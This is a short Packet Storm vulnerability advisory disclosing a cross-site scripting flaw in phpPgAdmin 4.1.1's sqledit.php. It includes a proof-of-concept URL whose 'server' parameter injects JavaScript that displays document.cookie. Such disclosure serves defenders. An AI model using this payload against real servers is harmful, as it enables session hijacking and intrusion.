phpPgAdmin-xss.txt

2007-05-23T00:00:00
ID PACKETSTORM:56920
Type packetstorm
Reporter Michal Majchrowicz
Modified 2007-05-23T00:00:00

Description

                                        
                                            `There is a JavaScript code Injection in phpPgAdmin which fails to correctly  
sanitize user supplied data. As a result very simple XSS is possible. This  
was tested on phpPgAdmin 4.1.1 as not logged user.  
PoC:  
https://test.com/phpPgAdmin/sqledit.php?server=%3A5432%3Aallow');alert(document.cookie);alert('phpPgAdmin%204.1.1%20XSS%20Vulnerability');//  
Regards Michal Majchrowicz.  
Hack.pl  
`